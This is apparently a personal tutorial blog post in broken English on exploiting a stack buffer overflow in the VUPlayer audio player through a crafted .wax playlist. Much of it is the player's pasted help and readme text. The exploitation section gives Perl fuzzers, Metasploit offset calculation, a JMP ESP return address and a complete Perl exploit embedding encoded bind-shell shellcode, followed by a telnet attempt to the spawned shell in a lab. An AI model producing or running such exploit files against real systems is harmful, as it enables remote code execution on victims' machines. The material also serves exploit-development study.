Exploit VUPplayer (Stack Based Overflows)

Before we doing Exploitation, we must doing Information Gathering.
why ? because we want to know what about our Victim. how the application doing input and processing the file. Now I will try with VUPplayer...

I. Information Gathering

  a. About VUPplayer we can see in appcliation Help + Content

By there i get a lot of information .. like that :

VUPlayer is a freeware multi-format audio player for Windows
supporting the following formats:

>>> Introduction

MOD • Sound/Noise/ProTracker
MTM • MultiTracker
S3M • ScreamTracker
XM • FastTracker
IT • ImpulseTracker
MO3 • MO3 Packer
MP3 • MPEG Audio
MP4 • QuickTime MPEG-4 (AAC/Apple Lossless)
MPC • Musepack
OGG • Ogg Vorbis
FLAC • Free Lossless Audio Codec
APE • Monkey's Audio
WV • WavPack
AIFF • Audio Interchange File Format
WMA • Windows Media Audio
WAV • Windows PCM/ACM
MIDI • Musical Instrument Digital Interface
CD • Audio CD

Features include:

• gapless playback •
• MP3/OGG/WMA internet file streaming •
• optional 32-bit mixing •
• 9-band graphic equalizer •
• volume, balance & pitch controls •
• full system tray functionality •
• timer playback/screen saver feature •
• configurable system-wide hotkeys •
• support for multiple visuals via a plug-in system •
• digital audio extraction •
• encoding to Ogg Vorbis, FLAC, APE, WMA & WV formats •
• Audioscrobbler support •
• remote freedb support •
• CD-Text support •

System requirements:

Microsoft Windows 95, 98, ME, NT, 2000, XP or Vista
Microsoft DirectX version 3 or later
32-bit mixing requires WDM audio drivers
Graphic EQ requires DirectX 8 (version 9 required for 32-bit mixing)
Windows Media Audio support requires Windows Media Player version 9 or later
QuickTime MPEG-4 support requires QuickTime version 7 or later
MIDI support requires a SoundFont
Audioscrobbler & freedb functionality requires an internet connection
Audio CD support requires Windows NT, 2000, XP or Vista
CD-Text support requires Windows XP or Vista

>>> File Menu

• Add URL
Adds an internet file stream to the current playlist. The address should begin with either "http://" or "ftp://".

>>> Option

• Buffer Length

Select the size of the output buffer. Using a shorter buffer length decreases latency, but could lead to occasional sound break up on older systems.

•  Enable Audioscrobbler

Select this to enable Audioscrobbler functionality. Audioscrobbler builds a profile of your musical taste by sending the name of every song you play to the Audioscrobbler server. For more information on this service, please visit the Audioscrobbler website.

- Username

Your Audioscrobbler username.

- Password

Your Audioscrobbler password.

- Clear Log

Clear the Audioscrobbler log file.

- View Log

View the Audioscrobbler log file.

>>> Version History

>>> Open informasi by application's instalation

by there we get same information.

VUPlayer v2.49

Copyright (C) 2000-2007 James Chapman

------------------------------------------------------------------------------

website: http://www.vuplayer.com

email: james@vuplayer.com

------------------------------------------------------------------------------

Overview

--------

VUPlayer is a freeware multi-format audio player for Windows

Supported formats:

MOD Sound/Noise/ProTracker

MTM MultiTracker

S3M ScreamTracker

XM FastTracker

IT ImpulseTracker

MO3 MO3 Packer

MP3 MPEG Audio

MP4 QuickTime MPEG-4 (AAC/Apple Lossless)

MPC Musepack

OGG Ogg Vorbis

FLAC Free Lossless Audio Codec

APE Monkey's Audio

WV WavPack

AIFF Audio Interchange File Format

WMA Windows Media Audio

WAV Windows PCM/ACM

MIDI Musical Instrument Digital Interface

CD Audio CD

Features include:

- gapless playback

- MP3/OGG/WMA internet file streaming

- optional 32-bit mixing

- 9-band graphic equalizer

- volume, balance & pitch controls

- full system tray functionality

- timer playback/screen saver feature

- configurable system-wide hotkeys

- support for multiple visuals via a plug-in system

- digital audio extraction

- encoding to Ogg Vorbis, FLAC, APE, WMA & WV formats

- Audioscrobbler support

- remote freedb support

- CD-Text support

System requirements

-------------------

Microsoft Windows 95, 98, ME, NT, 2000, XP or Vista.

Microsoft DirectX version 3 or later.

32-bit mixing requires WDM audio drivers.

Graphic EQ requires DirectX 8 (version 9 required for 32-bit mixing).

Windows Media Audio support requires Windows Media Player version 9 or later.

QuickTime MPEG-4 support requires QuickTime version 7 or later.

MIDI support requires a SoundFont.

Audioscrobbler & freedb functionality requires an internet connection.

Audio CD support requires Windows NT, 2000, XP or Vista.

CD-Text support requires Windows XP or Vista.

Troubleshooting

---------------

If problems occur running VUPlayer on Windows 95/98/NT systems,

please consult the following Microsoft Knowledge Base article

for details on how to update necessary system components:

http://support.microsoft.com/default.aspx?scid=kb;EN-US;q259403

Command Line Options

--------------------

VUPlayer <filename>

- loads VUPlayer with the specified file/folder and starts playback

VUPlayer -add <filename>

- loads VUPlayer with the specified file/folder

- if VUPlayer is already open, adds file/folder to the current playlist

VUPlayer -vpl <playlist>

- loads VUPlayer with the specified playlist

VUPlayer -cd <X:\>

- loads VUPlayer with drive X selected

VUPlayer -cd <X:\trackNN.cda>

- loads VUPlayer with track NN on drive X selected

ATI Remote Wonder Plug-In (vu_ammo.dll)

---------------------------------------

This plug-in supports the Play, Volume & Cursor key groups (Cursor

Up/Left maps to Previous Track, Cursor Down/Right maps to Next Track).

The programmable keys A-F can also be used for the Stop at Track End,

Volume Fade Out and Change Current Tab functions.

Credits

-------

Main program is Copyright (C) 2000-2007 James Chapman

http://www.vuplayer.com

BASS library is Copyright (C) 1999-2007 Ian Luck

http://www.un4seen.com

Ogg Vorbis is Copyright (C) 1994-2007 Xiph.Org Foundation

http://www.vorbis.com

FLAC is Copyright (C) 2000-2007 Josh Coalson

http://flac.sourceforge.net

Monkey's Audio is Copyright (C) 2000-2007 Matthew T. Ashland

http://www.monkeysaudio.com

WavPack is Copyright (C) 1998-2007 Conifer Software

http://www.wavpack.com

Musepack is Copyright (C) 2007 Musepack Development Team

http://www.musepack.net

QuickTime is Copyright (C) 2007 Apple Computer, Inc

http://www.apple.com/quicktime/

Portions utilize Microsoft Windows Media Technologies

Copyright (C) 1999-2007 Microsoft Corporation

All Rights Reserved

http://www.microsoft.com/windowsmedia/

Audioscrobbler is Copyright (C) 2002-2007 Audioscrobbler.com 

http://www.audioscrobbler.com

freedb is Copyright (C) 2000-2007 freedb.org

http://www.freedb.org

Usage, Distribution & Legal Stuff

---------------------------------

VUPlayer is freeware and may be freely used for any purpose.

Redistribution of the program must be done on a non-commercial

basis, and the entire contents of the archive must be maintained.

This program is provided as-is and is free for your own use.

Whilst every attempt has been made to ensure that the software is

free of problems, the developer offers no warranty for it, and

cannot accept responsiblity for any problems it may cause.

History

-------

· version 2.49 (18 September 2007) ·

updated to libvorbis 1.2.0, libFLAC 1.2.1 & WavPack 4.41

updated to version 2.3.0.3 of the BASS library

· version 2.48 (24 March 2007) ·

updated the Ogg Vorbis encoder to aoTuV Release 1

fixed a few minor bugs

· version 2.47 (28 February 2007) ·

added MIDI support via BASSMIDI

added a MOD interpolation option

switched to using BASSWMA for WMA decoding

updated to version 1.1.4 of libFLAC

fixed a couple of Windows 98 related bugs

· version 2.46 (25 January 2007) ·

updated to version 2.3.0.2 of the BASS library

updated to version 4.4 of WavPack

updated to version 1.2.4 of libmpcdec

updated the main program icon (finally)

· version 2.45 (3 December 2006) ·

updated to version 1.1.3 of libFLAC

· version 2.44 (26 August 2006) ·

new French language interface (thanks to Frédérick)

fixed a problem with ID3v2 tags

· version 2.43 (25 June 2006) ·

added AIFF playback support

added cue sheet support

updated to version 2.3 of the BASS library

updated to version 7 of the QuickTime API

· version 2.42 (11 February 2006) ·

fixed a problem with 8-bit WAV files

added support for mixed APE/ID3v1 tags

updated to version 1.1.2 of libvorbis

updated to version 4.31 of WavPack

· version 2.41 (8 October 2005) ·

updated to version 2.2 of the BASS library

· version 2.4 (19 April 2005) ·

added a balance control

added a 96000Hz sample rate option

added some extra buffer length options

added an option to autosave playlists

added a spectrum analyser display style

added read only ID3v2.3 tag support for MP3 & MPC files

added APE tag support for MP3, MPC & WavPack files

added Audioscrobbler support

added Musepack playback support

improved gapless playback support

updated the VU Meter plug-in

updated to version 1.1.2 of the FLAC libraries

fixed the counter to cope with altered pitch settings

added a new mystery bonus feature

added a WavPack encoder

updated the Windows Media Audio encoder

· version 2.3 (17 December 2004) ·

updated to version 2.1 of the BASS library

added MTM/MO3 support

added a preamp to the graphic equalizer

added a track number column to the playlist

added an extra filetype icon for XP users

various minor updates and fixes

· version 2.23 (13 October 2004) ·

added WavPack playback support

updated to version 1.1.0 of the Vorbis libraries

updated to version 1.1.1 of the FLAC libraries

fixed a memory leak in the file converter

· version 2.22 (9 August 2004) ·

included a new solidscope plugin

added an internal volume control option

added a special mystery bonus feature

fixed a QuickTime playback bug

· version 2.21 (30 June 2004) ·

fixed a bug with the Add File(s) function

altered the behaviour of the Fade to Next Track function

· version 2.2 (12 May 2004) ·

added QuickTime MPEG-4 (AAC/Apple Lossless) playback support

added Monkey's Audio playback & encoding support

added a delete file function

changed the WAV file writer into a transcoder

updated to freedb protocol level 6

started using UTF-8 for OGG/FLAC/APE/MP4 tagging

· version 2.11 (14 March 2004) ·

new Dutch language interface (thanks to Sander)

· version 2.11 (3 March 2004) ·

new German language interface (thanks to Stefan)

fixed a CD-Text bug, along with some other minor updates

· version 2.1 (5 February 2004) ·

implemented a WAV file writer

added support for RIFF text chunks in WAV files

new Swedish language interface (thanks to Marcus)

started using NSIS for the installer

· version 2.03 (9 December 2003) ·

split the program into separate language builds

· version 2.02 (28 November 2003) ·

fixed a couple of OGG/FLAC tag editing bugs

· version 2.01 (26 November 2003) ·

updated to version 1.01 of the Ogg Vorbis libraries

· version 2.0 (14 November 2003) ·

added a level-based crossfader

added custom file naming to the audio extraction feature

improved Audio CD playback performance

replaced the keyboard hook with configurable system-wide hotkeys

new Spanish language interface (thanks to Vicente)

new Italian language interface (thanks to Lorenzo)

updated to version 2.0 of the BASS library

started using UPX to pack the program

· version 1.9 (2 September 2003) ·

new mini control plug-in

added gapless WMA playback

added always on top and drag & drop functionality to the visuals

added support for folders on the command line

· version 1.8 (26 July 2003) ·

added support for MP3/OGG internet file streaming

fixed length calculation for MP3 files with VBRI headers

· version 1.7 (23 June 2003) ·

fixed an Audio CD recognition bug

re-enabled Audio CD support for Windows NT systems

· version 1.6 (1 June 2003) ·

added Windows Media Audio 9 Professional encoding options

added a manual refresh option to the CD drive menu

removed the limit on the maximum playlist size

· version 1.5 (25 May 2003) ·

a help file has finally been compiled

enabled FLAC tag editing

enabled freedb data submissions

shifted configuration settings to the registry

fixed a few issues related to multi-user environments

· version 1.4 (4 May 2003) ·

new CD ripping feature with a plug-in encoder system

added Ogg Vorbis, FLAC & Windows Media Audio 9 encoders

added remote freedb support for disc information retrieval

improved support for Audio CDs with a 'hidden track 0'

fixed a cmdline startup bug

· version 1.3 (29 March 2003) ·

new 32-bit mixing option (requires WDM audio drivers)

new 9-band graphic equalizer (requires DirectX 8 or later)

rearranged the main window layout

added support for multiple visuals via a new plug-in system

added CD-Text support for Windows XP systems

added FLAC support

added a playlist repeat feature

added an option to remember the last playback position on exit

various minor updates and enhancements

· version 1.2 (10 January 2003) ·

updated the Windows Media Audio 9 decoder

fixed M3U playlist loading

fixed a bug with Audio CD file type registration

included a plug-in for the ATI Remote Wonder

· version 1.1 (15 December 2002) ·

added DAE based Audio CD playback for Windows NT/2000/XP systems

· version 1.05 (3 September 2002) ·

added skip forwards/backwards functions

included a new jump to track feature

fixed an ogg vorbis loading bug

updated to BASS 1.6 (spectrum analyser now uses a stereo FFT)

· version 1.04 (13 August 2002) ·

new keyboard hook feature for background monitoring of function keys

added hot key support for enhanced keyboards

added mute volume & volume up/down functions

removed the dependency on multimedia timers

updated ogg vorbis code to version 1.0

shuffled WMA code off into a separate library

the usual round of minor updates and bugfixes

· version 1.01 (3 March 2002) ·

minor update to improve support for badly formatted MP3 files

· version 1.0 (27 January 2002) ·

split the program into two versions, standard & full

windows media audio playback is included in the full version

both versions are now supplied with a full installer

gapless ogg vorbis playback is now an option

random playback has been improved slightly

· version 0.9 (1 January 2002) ·

ogg vorbis support has been updated to RC3

ogg vorbis comment editing has been added

timer playback has been copied over from my other cd program

support for Windows XP visual styles

compatibility fix for Windows 95/95a systems

· version 0.8 (14 October 2001) ·

added full system tray functionality

included a new 'add folder' function to scan for music files

a new spectrum analyser display style has been added

improved sorting by using a stable 2-pass shell sort method

it is now possible to show/hide the volume controls

· version 0.7 (27 July 2001) ·

the main program window is now fully resizable

the playlist display can now be customized (font & colour)

it is now possible to show, hide and reorder columns

extra categories have also been added to the playlist

the maximum playlist size has been increased to 10000 entries

added 'start playback on program launch/playlist open' options

included a new 'add to playlist' command line/shell option

MP2 file format support has been added

surround sound modes have been shifted to the options screen

some new volume ramping options for MOD/S3M/XM/IT files

soundcard tone & balance controls have been added

the BASS library has been updated to version 1.0

ogg vorbis support has been updated to RC2 (14 August 2001)

tracked down some bugs to improve general program stability

· version 0.6 (28 May 2001) ·

the BASS library has been updated to version 0.9

(improved MPEG support and new MOD surround sound modes)

added 'volume fade out' and 'stop at track end' options

added M3U playlist loading (not extensively tested)

· version 0.5 (16 April 2001) ·

minor update to include a new oscilloscope display style

updated the example source code (see website for details)

· version 0.4 (22 March 2001) ·

added ogg vorbis support (no comment editing yet though)

improved support for MP3 files

· version 0.3 (9 February 2001) ·

fixed the problem on WindowsNT/2000

(this was due to a stuck GlobalDeleteAtom loop which

should have caused the program to fail on Win98 as well)

added 25/50fps right-click menu on the VU Meters

right click also centres the Mixing & Panning sliders

some more general bugfixes

· version 0.2 (8 January 2001) ·

file type registration has been added

track repeat and random play have been added

numerous bugfixes 

· version 0.1 (10 October 2000) ·

initial release of the program

Information Passive by Internet

------------------------------------------------------------------------------

II. SERVICE ENUMURATION

I get information like that :

  a. The application have a lot of support format

       For Example : MP3, MP3, WAV etc..

  b. internet file stream

  c. Buffer Length

  d. User name & Password

III. VULNERABILITY IDENTIFICATION

based on experience, we can try to create a fuzzer in a format that is supported bythe application. examples. wav and we will try to overwrite through FLS (streamingfile).

but if this action done work we can try any ways

IV. EXPLOITASI

      I will try make a fuzzer for overwrite the application by send 1000 character.

a. make Fuzzer with Perl

my $file="music.wax";
my $buffer="\x41" x 3000;
open ($FILE, ">$file");
print $FILE "$file.$buffer";
close ($FILE);
print "created\n";

root@justview:~# perl aa.perl

copy result into windows and load the music. and we can see the application is crash.

b. we try run the application with Ollydbg

we can see with using 3000 character the application crash.

c.  

my $file="music.wax";

my $buffer="\x41" x 1000;

my $buffer2="\x42" x 2000;

open ($FILE, ">$file");

print $FILE "$file.$buffer.$buffer2";

close ($FILE);

print "created\n";

value EIP 424242 and we know that byte EIP betwen 1000-2000. create dummies's data who has structured

root@justview:/pentest/exploits/framework/tools# ./pattern_create.rb 2000 > string_pattern.txt

after create we can open the file 

root@justview:/pentest/exploits/framework/tools# kwrite string_pattern.txt 

and showing

create file and copy into your windows then run your application and load the file's music. look at result.

now we can calculate value of EIP( 61413061) because the data is structured. next we try calculate value of register EIP.

root@justview:/pentest/exploits/framework/tools# ./pattern_offset.rb  61413061

result 1

1. That’s the buffer length needed to overwrite EIP. So if you create a file with 1000+1 = 1001 A’s, and then add 4 B’s (42 42 42 42 in hex) EIP should contain 42 42 42 42.  We also know that ESP points at data from our buffer, so we’ll add some C’s after overwriting EIP.

Let’s try. Modify the perl script to create the new m3u file.

my $file="hajar.wax";

my $buffer="\x41" x 1001;

my $eip="\x42\x42\x42\x42";

my $espdata="\x90" x 1000;

open ($FILE, ">$file");

print $FILE "$file.$buffer.$eip.$espdata";

close ($FILE);

print "created\n";

result

EIP 424242 or BBBB

d.       We control EIP. So we can point EIP to somewhere else, to a place that contains our own code (shellcode).  But where is this space, how can we put our shellcode in that location and how can we make EIP jump to that location ?

Remeber about JMP ESP at Exploit warftp ??
1. Run the application using Ollydb. on menu view choose sub menu Executale modules

2. will show executables modules

3. choose file library which serve as a springboard for the EIP register to enter the stack, and we will choose shell32.dll


4. after determine library, double click the file and then will show window new CPU from file library.

5. Next step is search JMP ESP in the file.
       right click on menu ------> Search FOr ----> COmmand and will show

6. Input  JMP ESP in command and press push find

Preparing PAY LOAD Using METASPLOIT

after Run Msfweb

Open Browser and http://127.0.0.1:55555/PAYLOADS

at filter modus choose os :: win32

then windows bind cell

configure like that + Generate

my $file="dor.wax";

my $buffer="\x41" x 1001;

my $eip=pack('V',0x7C9D30D7);

my $shellcode="\x90" x 25;

$shellcode=$shellcode."\x29\xc9\xdb\xdb\xbe\x16\xc3\x6f\x9c\xb1\x51\xd9\x74\x24\xf4\x5f".

"\x31\x77\x15\x03\x77\x15\x83\xf9\x3f\x8d\x69\xf9\xaa\xb9\xdf\xe9".

"\xd2\xc1\x1f\x16\x44\xb5\x8c\xcc\xa1\x42\x09\x30\x21\x28\x97\x30".

"\x34\x3e\x1c\x8f\x2e\x4b\x7c\x2f\x4e\xa0\xca\xa4\x64\xbd\xcc\x54".

"\xb5\x01\x57\x04\x32\x41\x1c\x53\xfa\x88\xd0\x5a\x3e\xe7\x1f\x67".

"\xea\xdc\xf7\xe2\xf7\x96\x57\x28\xf9\x43\x01\xbb\xf5\xd8\x45\xe4".

"\x19\xde\xb2\x19\x0e\x6b\xcd\x71\x6a\x77\xaf\x4a\x43\x5c\x4b\xc7".

"\xe7\x52\x1f\x97\xeb\x19\x6f\x0b\x59\x96\xd0\x3b\xff\xc1\x5e\x75".

"\xf1\xfd\x0f\x76\xdb\x98\xfc\xee\x8c\x57\x31\x86\x3b\xeb\x07\x09".

"\x90\xf4\xb8\xdd\xd3\xe6\xc5\x26\xb4\x07\xe3\x07\xbd\x1d\x6a\x36".

"\x50\xd5\x71\x6d\xc1\xe4\x8a\x5d\x7d\x30\x7d\xa8\xd3\x95\x81\x84".

"\x7f\x49\x2d\x7b\xd3\x2e\x82\x38\x80\x4f\xf4\xd8\x4e\xa1\xa9\x42".

"\xdc\x48\xb0\x1f\x8a\xee\x29\x6f\x8c\xb8\xb2\x59\x78\x57\x1c\x30".

"\x82\x87\xf6\x1e\xd1\x06\xee\x09\xd5\x81\xa3\xe0\xd6\xfe\x2c\xef".

"\x60\x79\xe5\xb8\x8d\x53\xa6\x12\x26\x09\xb8\x4a\x55\xd9\xa1\x13".

"\x9c\x63\x79\x1c\xf6\xc1\x7a\x32\x91\x83\xe0\xd4\x36\x37\x84\x91".

"\x22\xdd\x06\xf8\x85\xee\x2e\x1d\xbf\xaa\xb9\x03\x71\xf3\x49\x69".

"\x8c\xb1\x80\x93\x33\x1a\x48\xe6\xce\x5a\xc5\x53\x85\xf3\x6b\x5d".

"\x69\x15\x73\xd4\xca\xe5\x5d\x4d\x84\x4b\x33\x20\x7b\x06\xb2\x93".

"\x2a\x83\xe5\xec\x1d\x43\xab\xcb\x9b\x5a\xe0\x14\x75\x08\xf8\x15".

"\x4d\x32\xd6\x62\xe5\x30\x54\xb0\x6e\x36\x8d\x6a\x90\x18\x5a\x7a".

"\xe4\x9d\xc4\x29\x06\x4b\x05\x1d";

open ($FILE, ">$file");

print $FILE "$file.$buffer.$eip.$shellcode";

close ($FILE);

print "created\n";

the program is crash but cannot to remote

when i try telnet 192.168.56.101 4444

result

tobe continue...

I have do some ways but i get same result..

just now i get result

But after i try telnet i get result

root@justview:~# telnet 192.168.56.101 4444
Trying 192.168.56.101...
Connected to 192.168.56.101.
Escape character is '^]'.
Connection closed by foreign host.

I don't what is wrong but i try again with follow of ways eksploit Warftp with python language.. finally i get result :

but of this case i using JMP ESP of BASSWMA